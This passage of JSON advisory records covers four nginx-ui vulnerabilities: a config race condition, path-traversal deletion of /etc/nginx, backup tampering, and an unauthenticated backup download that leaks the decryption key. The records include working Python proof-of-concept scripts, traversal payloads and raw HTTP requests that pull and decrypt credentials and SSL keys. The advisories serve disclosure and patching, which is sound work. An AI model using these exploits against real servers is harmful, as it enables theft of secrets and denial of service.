src=\"https://github.com/user-attachments/assets/7522ba29-39f1-4c22-88f2-8e859cdb1984\" /\u003e\n\n6. **Observation (Recovery Failure)**: If the service redirects to `/install`, attempting to complete the setup again often fails because the underlying configuration state is too corrupted to be reconciled by the installer logic.\n7. **Observation (Total Service Collapse)**: When the corruption in `app.ini` becomes so severe, the Go runtime or the INI parser encounters a fatal error, causing the Nginx-UI service to stop responding entirely (Hard DoS).\n\n\u003cimg width=\"1344\" height=\"542\" alt=\"image\" src=\"https://github.com/user-attachments/assets/da4b99dc-ddce-4b79-b0bb-2d634bdd3bf7\" /\u003e\n\n8. **Observation (Cross-Section Contamination)**: During testing, it was observed that sometimes INI sections become interleaved. For example, fields belonging to the `[nginx]` section (like `ConfigDir` or `ReloadCmd`) were erroneously written under the `[webauthn]` section.\n   \n   **Example of corrupted output observed:**\n```\n[webauthn]\nRPDisplayName  = \nRPID           = \nRPOrigins      = \ngDirWhiteList  = \nConfigDir      = /etc/nginx\nConfigPath     = \nPIDPath        = /run/nginx.pid\nSbinPath       = \nTestConfigCmd  = \nReloadCmd      = nginx -s reload\nRestartCmd     = nginx -s stop\nStubStatusPort = 51820\nContainerName  = \n```\n\n### Impact\nThis is a **High** security risk (CWE-362: Race Condition).\n- **Integrity**: Permanent corruption of application settings and system-level configuration.\n- **Availability**: High. The attack results in a persistent Denial of Service that cannot be recovered via the web UI.\n- **Remote Code Execution (RCE)** Risk: Since the application allows updating certain fields (like Node Name) and uses others as shell commands (like ReloadCmd or RestartCmd), the observed \"cross-contamination\" of INI values means an attacker could potentially force a user-controlled string into a command execution field. If ReloadCmd is overwritten with a malicious payload provided in another field, the next nginx reload will execute that payload. While highly impactful, this specific exploit path is non-deterministic and depends on the precise interleaving of thread execution, making targeted exploitation difficult.\n\n### Recommended Mitigation\n1.  **Implement Mutex Locking**: Wrap the `ProtectedFill` and `settings.Save()` calls in a `sync.Mutex` to serialize access to global settings.\n2.  **Atomic File Writes**: Implement a \"write-then-rename\" strategy. Write the new configuration to `app.ini.tmp` and use `os.Rename()` to replace the original file atomically, ensuring the configuration file is always in a valid state.\n\nA patched version of nginx-ui  is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-30T16:34:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-m468-xcm6-fxg4","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://nvd.nist.gov/vuln/detail/CVE-2026-33028","https://github.com/advisories/GHSA-m468-xcm6-fxg4"],"source_kind":"github","identifiers":["GHSA-m468-xcm6-fxg4","CVE-2026-33028"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.335Z","updated_at":"2026-10-07T14:04:25.050Z","epss_percentage":0.00592,"epss_percentile":0.46508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNDY4LXhjbTYtZnhnNM4ABUdK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNDY4LXhjbTYtZnhnNM4ABUdK","packages":[{"ecosystem":"go","package_name":"github.com/uozi-tech/cosy","versions":[{"first_patched_version":"1.30.1","vulnerable_version_range":"\u003c= 1.30.0"}],"purl":"pkg:go/github.com%2Fuozi-tech%2Fcosy"},{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.99"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNDY4LXhjbTYtZnhnNM4ABUdK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tOHA4LTUzdmYtODM1N84ABUdJ","url":"https://github.com/advisories/GHSA-m8p8-53vf-8357","title":"Nginx Configuration Directory Vulnerable to Recursive Deletion via Improper Path Validation","description":"## Summary\nThe nginx-ui configuration improperly handles URL-encoded traversal sequences. When specially crafted paths are supplied, the backend resolves them to the base Nginx configuration directory and executes the operation on the base directory (/etc/nginx). In particular, this allows an authenticated user to remove the entire `/etc/nginx` directory, resulting in a partial Denial of Service.\n\n## Details\nThe file deletion logic fails to correctly validate and normalize paths containing URL-encoded traversal sequences such as `..%252F`.\n\nWhen such input is processed, the internal path resolution logic attempts to clamp the path into the allowed configuration directory. Instead of rejecting the traversal attempt, the clamping mechanism resolves the path to the base Nginx configuration directory itself.\n\nBecause the deletion handler invokes `os.RemoveAll`, which recursively removes directories, this results in the deletion of the entire `/etc/nginx` directory.\n\nThis behavior creates a dangerous interaction between path normalization and deletion logic:\n\n- Traversal sequences are not rejected.\n- Double-encoding (`..%252F`) is used to bypass initial shallow filters.\n- The clamping mechanism resolves malicious paths to the base configuration directory.\n- The deletion handler recursively deletes the resolved path.\n\nAs a result, an attacker can trigger deletion of the entire Nginx configuration directory instead of being blocked by path validation logic.\n\n### Root Cause\n\nThe vulnerability results from a combination of design flaws:\n\n- **Improper Path Canonicalization**: URL-encoded traversal sequences are not properly rejected.\n- **Unsafe Fallback Logic**: The `GetConfPath` clamping mechanism returns the base configuration directory when traversal is detected instead of rejecting the request.\n- **Unsafe Deletion Primitive**: The deletion handler invokes `os.RemoveAll`, which recursively deletes directories without additional safeguards. (delete.go)\n```\n\t// Delete the file or directory\n\terr = os.RemoveAll(fullPath)\n\tif err != nil {\n\t\tcosy.ErrHandler(c, err)\n\t\treturn\n\t}\n```\nThis interaction causes the deletion operation to target the most sensitive directory when a traversal attempt occurs.\n\n### Environment\n- **Server OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Nginx UI Version**:  nginx-ui v2.3.3\n- **Deployment**: Docker / Default installation\n\n\n## Proof of Concept\n### Steps to Reproduce\n1. Log into nginx-ui.\n\n2. Go to Manage Configs and create a Folder named *..%252F..%252F..%252F..%252Ftest*\n\u003cimg width=\"1608\" height=\"559\" alt=\"image\" src=\"https://github.com/user-attachments/assets/738d7d65-7e13-48fa-affc-d5509c43900f\" /\u003e\n\n3. Observe that the backend resolves the path to /etc/nginx.. \n\n4. Now lets create a file called *testing*. \n\n5. Save it and rename it to *..%252F..%252F..%252F..%252Ftest* (It is not possible to create it directly with the payload name so we have to rename it)\n\n6. Go back to manage configs and Click Delete to remove the file we just created. \n\n7. Check that there is an error: \n\u003cimg width=\"1578\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/51a36310-0676-4fe5-b80c-e0199498efbf\" /\u003e\n\n8. Reload the website and check that the /etc/nginx folder has been completely removed: \n\u003cimg width=\"1313\" height=\"722\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0a9ddd1b-786b-4cf2-8abd-1dc6f3a77807\" /\u003e\n\n\n## Impact\n\nAn authenticated user capable of invoking the configuration deletion endpoint can trigger the recursive deletion of the entire Nginx configuration directory (`/etc/nginx`).\n\nThis results in:\n- Immediate failure of the Nginx service due to missing configuration files.\n- Loss of all Nginx configuration managed by nginx-ui.\n- Denial of Service for all web services relying on the affected Nginx instance.\n\nAs the deletion operation uses a recursive filesystem call, the entire configuration directory is removed, leaving the system unable to restart Nginx until the configuration is manually restored.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-30T16:33:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-m8p8-53vf-8357","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://nvd.nist.gov/vuln/detail/CVE-2026-33027","https://github.com/advisories/GHSA-m8p8-53vf-8357"],"source_kind":"github","identifiers":["GHSA-m8p8-53vf-8357","CVE-2026-33027"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.335Z","updated_at":"2026-09-28T20:04:30.770Z","epss_percentage":0.00546,"epss_percentile":0.43512,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOHA4LTUzdmYtODM1N84ABUdJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tOHA4LTUzdmYtODM1N84ABUdJ","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.99"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOHA4LTUzdmYtODM1N84ABUdJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1maGgyLWdnN3ctZ3dwcc4ABUdI","url":"https://github.com/advisories/GHSA-fhh2-gg7w-gwpq","title":"nginx-ui Backup Restore Allows Tampering with Encrypted Backups","description":"## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n  - `backup_crypto.go`\n  - `backup.go`\n  - `restore.go`\n  - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n    \u003cimg width=\"1483\" height=\"586\" alt=\"image\" src=\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\" /\u003e\n\n2. Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n    key = base64.b64decode(key_b64)\n    iv = base64.b64decode(iv_b64)\n    \n    cipher = AES.new(key, AES.MODE_CBC, iv)\n    decrypted = cipher.decrypt(encrypted_data)\n    return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n    key_b64, iv_b64 = token.split(\":\")\n    os.makedirs(output_dir, exist_ok=True)\n    print(f\"[*] File processing: {file_path}\")\n    \n    with zipfile.ZipFile(file_path, 'r') as main_zip:\n        main_zip.extractall(output_dir)\n        \n    files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n    \n    for filename in files_to_decrypt:\n        path = os.path.join(output_dir, filename)\n        if os.path.exists(path):\n            with open(path, \"rb\") as f:\n                encrypted = f.read()\n            \n            decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n            \n            out_path = path + \".decrypted\"\n            with open(out_path, \"wb\") as f:\n                f.write(decrypted)\n            print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n    process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n    key = base64.b64decode(key_b64)\n    iv = base64.b64decode(iv_b64)\n    cipher = AES.new(key, AES.MODE_CBC, iv)\n    return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n    key_b64, iv_b64 = token.split(\":\")\n    \n    encrypted_blobs = {}\n    for fname in files:\n        with open(fname, \"rb\") as f:\n            data = f.read()\n        \n        blob = encrypt_file(data, key_b64, iv_b64)\n\n        target_name = fname.replace(\".decrypted\", \"\")\n        encrypted_blobs[target_name] = blob\n        print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n    hash_content = \"\"\n    for name, blob in encrypted_blobs.items():\n        h = hashlib.sha256(blob).hexdigest()\n        hash_content += f\"{name}: {h}\\n\"\n    \n    encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n    encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n    with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:\n        for name, blob in encrypted_blobs.items():\n            zf.writestr(name, blob)\n            \n    print(f\"\\n[*] Backup rebuild: {output_filename}\")\n    print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n    build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n   \u003cimg width=\"1059\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\" /\u003e\n\n\n8. **Observation**: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n   \u003cimg width=\"1316\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\" /\u003e\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n   - Signing backup metadata using a server-side private key\n   - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. **Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-30T16:23:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq","https://github.com/advisories/GHSA-g9w5-qffc-6762","https://nvd.nist.gov/vuln/detail/CVE-2026-33026","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://github.com/0xJacky/nginx-ui/commit/f61bcec547c0f305e35348d6440ef156c1d5c3cb","https://pkg.go.dev/vuln/GO-2026-4903","https://github.com/advisories/GHSA-fhh2-gg7w-gwpq"],"source_kind":"github","identifiers":["GHSA-fhh2-gg7w-gwpq","CVE-2026-33026"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.335Z","updated_at":"2026-09-25T12:02:13.462Z","epss_percentage":0.00211,"epss_percentile":0.10136,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1maGgyLWdnN3ctZ3dwcc4ABUdI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1maGgyLWdnN3ctZ3dwcc4ABUdI","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20260315015203-f61bcec547c0","vulnerable_version_range":"\u003c 1.9.10-0.20260315015203-f61bcec547c0"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1maGgyLWdnN3ctZ3dwcc4ABUdI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nOXc1LXFmZmMtNjc2Ms4ABTO8","url":"https://github.com/advisories/GHSA-g9w5-qffc-6762","title":"Nginx-UI Vulnerable to Unauthenticated Backup Download with Encryption Key Disclosure","description":"## Summary\n\nThe `/api/backup` endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the `X-Backup-Security` response header. This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| CWE | CWE-306: Missing Authentication for Critical Function + CWE-311: Missing Encryption of Sensitive Data |\n| Affected File | `api/backup/router.go` |\n| Affected Function | `CreateBackup` (lines 8-11 in router, implementation in `api/backup/backup.go:13-38`) |\n| Secondary File | `internal/backup/backup.go` |\n| CVSS 3.1 | 9.8 (Critical) |\n| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |\n\n## Root Cause\n\nThe vulnerability exists due to two critical security flaws:\n\n### 1. Missing Authentication on /api/backup Endpoint\n\nIn `api/backup/router.go:9`, the backup endpoint is registered without any authentication middleware:\n\n```go\nfunc InitRouter(r *gin.RouterGroup) {\n\tr.GET(\"/backup\", CreateBackup)  // No authentication required\n\tr.POST(\"/restore\", middleware.EncryptedForm(), RestoreBackup)  // Has middleware\n}\n```\n\nFor comparison, the restore endpoint correctly uses middleware, while the backup endpoint is completely open.\n\n### 2. Encryption Keys Disclosed in HTTP Response Headers\n\nIn `api/backup/backup.go:22-33`, the AES-256 encryption key and IV are sent in plaintext via the `X-Backup-Security` header:\n\n```go\nfunc CreateBackup(c *gin.Context) {\n\tresult, err := backup.Backup()\n\tif err != nil {\n\t\tcosy.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\t// Concatenate Key and IV\n\tsecurityToken := result.AESKey + \":\" + result.AESIv  // Keys sent in header\n\n\t// ...\n\tc.Header(\"X-Backup-Security\", securityToken) // Keys exposed to anyone\n\n\t// Send file content\n\thttp.ServeContent(c.Writer, c.Request, fileName, modTime, reader)\n}\n```\n\nThe encryption keys are Base64-encoded AES-256 key (32 bytes) and IV (16 bytes), formatted as `key:iv`.\n\n### 3. Backup Contents\n\nThe backup archive (created in `internal/backup/backup.go`) contains:\n\n```go\n// Files included in backup:\n- nginx-ui.zip (encrypted)\n  └── database.db          // User credentials, session tokens\n  └── app.ini              // Configuration with secrets\n  └── server.key/cert      // SSL certificates\n\n- nginx.zip (encrypted)\n  └── nginx.conf           // Nginx configuration\n  └── sites-enabled/*      // Virtual host configs\n  └── ssl/*                // SSL private keys\n\n- hash_info.txt (encrypted)\n  └── SHA-256 hashes for integrity verification\n```\n\nAll files are encrypted with AES-256-CBC, but the keys are disclosed in the response.\n\n## Proof of Concept\n\n### Python script\n\n```python\n#!/usr/bin/env python3\n\n\"\"\"\nPOC: Unauthenticated Backup Download + Key Disclosure via X-Backup-Security\n\nUsage:\n  python poc.py --target http://127.0.0.1:9000 --out backup.bin --decrypt\n\"\"\"\n\nimport argparse\nimport base64\nimport os\nimport sys\nimport urllib.parse\nimport urllib.request\nimport zipfile\nfrom io import BytesIO\n\ntry:\n    from Crypto.Cipher import AES\n    from Crypto.Util.Padding import unpad\nexcept ImportError:\n    print(\"Error: pycryptodome required for decryption\")\n    print(\"Install with: pip install pycryptodome\")\n    sys.exit(1)\n\n\ndef _parse_keys(hdr_val: str):\n    \"\"\"\n    Parse X-Backup-Security header format: \"base64_key:base64_iv\"\n    Example: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==\n    \"\"\"\n    v = (hdr_val or \"\").strip()\n\n    # Format is: key:iv (both base64 encoded)\n    if \":\" in v:\n        parts = v.split(\":\", 1)\n        if len(parts) == 2:\n            return parts[0].strip(), parts[1].strip()\n\n    return None, None\n\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n    \"\"\"Decrypt using AES-256-CBC with PKCS#7 padding\"\"\"\n    key = base64.b64decode(key_b64)\n    iv = base64.b64decode(iv_b64)\n\n    if len(key) != 32:\n        raise ValueError(f\"Invalid key length: {len(key)} (expected 32 bytes for AES-256)\")\n    if len(iv) != 16:\n        raise ValueError(f\"Invalid IV length: {len(iv)} (expected 16 bytes)\")\n\n    cipher = AES.new(key, AES.MODE_CBC, iv)\n    decrypted = cipher.decrypt(encrypted_data)\n    return unpad(decrypted, AES.block_size)\n\n\ndef extract_backup(encrypted_zip_path: str, key_b64: str, iv_b64: str, output_dir: str):\n    \"\"\"Extract and decrypt the backup archive\"\"\"\n    print(f\"\\n[*] Extracting encrypted backup to {output_dir}\")\n\n    os.makedirs(output_dir, exist_ok=True)\n\n    # Extract the main ZIP (contains encrypted files)\n    with zipfile.ZipFile(encrypted_zip_path, 'r') as main_zip:\n        print(f\"[*] Main archive contains: {main_zip.namelist()}\")\n        main_zip.extractall(output_dir)\n\n    # Decrypt each file\n    encrypted_files = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n\n    for filename in encrypted_files:\n        filepath = os.path.join(output_dir, filename)\n        if not os.path.exists(filepath):\n            print(f\"[!] Warning: {filename} not found\")\n            continue\n\n        print(f\"[*] Decrypting {filename}...\")\n\n        with open(filepath, \"rb\") as f:\n            encrypted = f.read()\n\n        try:\n            decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n\n            # Write decrypted file\n            decrypted_path = filepath.replace(\".zip\", \"_decrypted.zip\") if filename.endswith(\".zip\") else filepath + \".decrypted\"\n            with open(decrypted_path, \"wb\") as f:\n                f.write(decrypted)\n\n            print(f\"    → Saved to {decrypted_path} ({len(decrypted)} bytes)\")\n\n            # If it's a ZIP, extract it\n            if filename.endswith(\".zip\"):\n                extract_dir = os.path.join(output_dir, filename.replace(\".zip\", \"\"))\n                os.makedirs(extract_dir, exist_ok=True)\n                with zipfile.ZipFile(BytesIO(decrypted), 'r') as inner_zip:\n                    inner_zip.extractall(extract_dir)\n                    print(f\"    → Extracted {len(inner_zip.namelist())} files to {extract_dir}\")\n\n        except Exception as e:\n            print(f\"    ✗ Failed to decrypt {filename}: {e}\")\n\n    # Show hash info\n    hash_info_path = os.path.join(output_dir, \"hash_info.txt.decrypted\")\n    if os.path.exists(hash_info_path):\n        print(f\"\\n[*] Hash info:\")\n        with open(hash_info_path, \"r\") as f:\n            print(f.read())\n\ndef main():\n    ap = argparse.ArgumentParser(\n        description=\"Nginx UI - Unauthenticated backup download with key disclosure\"\n    )\n    ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:port\")\n    ap.add_argument(\"--out\", default=\"backup.bin\", help=\"Where to save the encrypted backup\")\n    ap.add_argument(\"--decrypt\", action=\"store_true\", help=\"Decrypt the backup after download\")\n    ap.add_argument(\"--extract-dir\", default=\"backup_extracted\", help=\"Directory to extract decrypted files\")\n\n    args = ap.parse_args()\n\n    url = urllib.parse.urljoin(args.target.rstrip(\"/\") + \"/\", \"api/backup\")\n\n    # Unauthenticated request to the backup endpoint\n    req = urllib.request.Request(url, method=\"GET\")\n\n    try:\n        with urllib.request.urlopen(req, timeout=20) as resp:\n            hdr = resp.headers.get(\"X-Backup-Security\", \"\")\n            key, iv = _parse_keys(hdr)\n            data = resp.read()\n    except urllib.error.HTTPError as e:\n        print(f\"[!] HTTP Error {e.code}: {e.reason}\")\n        sys.exit(1)\n    except Exception as e:\n        print(f\"[!] Error: {e}\")\n        sys.exit(1)\n\n    with open(args.out, \"wb\") as f:\n        f.write(data)\n\n    # Key/IV disclosure in response header enables decryption of the downloaded backup\n    print(f\"\\nX-Backup-Security: {hdr}\")\n    print(f\"Parsed AES-256 key: {key}\")\n    print(f\"Parsed AES IV    : {iv}\")\n\n    if key and iv:\n        # Verify key/IV lengths\n        try:\n            key_bytes = base64.b64decode(key)\n            iv_bytes = base64.b64decode(iv)\n            print(f\"\\n[*] Key length: {len(key_bytes)} bytes (AES-256 ✓)\")\n            print(f\"[*] IV length : {len(iv_bytes)} bytes (AES block size ✓)\")\n        except Exception as e:\n            print(f\"[!] Error decoding keys: {e}\")\n            sys.exit(1)\n\n        if args.decrypt:\n            try:\n                extract_backup(args.out, key, iv, args.extract_dir)\n\n            except Exception as e:\n                print(f\"\\n[!] Decryption failed: {e}\")\n                import traceback\n                traceback.print_exc()\n                sys.exit(1)\n    else:\n        print(\"\\n[!] Failed to parse encryption keys from X-Backup-Security header\")\n        print(f\"    Header value: {hdr}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n```bash\n# Download and decrypt backup (no authentication required)\n# pip install pycryptodome\npython poc.py --target http://victim:9000 --decrypt\n```\n\n```\nX-Backup-Security: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=:+rLZrXK3kbWFRK3qMpB3jw==\nParsed AES-256 key: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=\nParsed AES IV    : +rLZrXK3kbWFRK3qMpB3jw==\n\n[*] Key length: 32 bytes (AES-256 âœ“)\n[*] IV length : 16 bytes (AES block size âœ“)\n\n[*] Extracting encrypted backup to backup_extracted\n[*] Main archive contains: ['hash_info.txt', 'nginx-ui.zip', 'nginx.zip']\n[*] Decrypting hash_info.txt...\n    â†’ Saved to backup_extracted/hash_info.txt.decrypted (199 bytes)\n[*] Decrypting nginx-ui.zip...\n    â†’ Saved to backup_extracted/nginx-ui_decrypted.zip (12510 bytes)\n    â†’ Extracted 2 files to backup_extracted/nginx-ui\n[*] Decrypting nginx.zip...\n    â†’ Saved to backup_extracted/nginx_decrypted.zip (5682 bytes)\n    â†’ Extracted 17 files to backup_extracted/nginx\n\n[*] Hash info:\nnginx-ui_hash: 7c803b9b8791cebfad36977a321431182b22878c3faf8af544d05318ccb83ad5\nnginx_hash: 183458949e54794e1295449f0d6c1175bb92c1ee008be671ee9ee759aad73905\ntimestamp: 20260129-122110\nversion: 2.3.2\n```\n\n### HTTP Request (Raw)\n\n```http\nGET /api/backup HTTP/1.1\nHost: victim:9000\n\n```\n\n**No authentication required** - this request will succeed and return:\n- Encrypted backup as ZIP file\n- Encryption keys in `X-Backup-Security` header\n\n### Example Response\n\n```http\nHTTP/1.1 200 OK\nContent-Type: application/zip\nContent-Disposition: attachment; filename=backup-20260129-120000.zip\nX-Backup-Security: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==\n\n[Binary ZIP data]\n```\n\nThe `X-Backup-Security` header contains:\n- **Key**: `e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=` (Base64-encoded 32-byte AES-256 key)\n- **IV**: `7XdVSRcgYfWf7C/J0IS8Cg==` (Base64-encoded 16-byte IV)\n\n\u003cimg width=\"1430\" height=\"835\" alt=\"screenshot\" src=\"https://github.com/user-attachments/assets/a2e23c48-2272-4276-81de-fc700ff05b17\" /\u003e\n\n## Resources\n\n- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)\n- [CWE-311: Missing Encryption of Sensitive Data](https://cwe.mitre.org/data/definitions/311.html)\n- [OWASP: Broken Authentication](https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication)\n- [OWASP: Sensitive Data Exposure](https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure)\n- 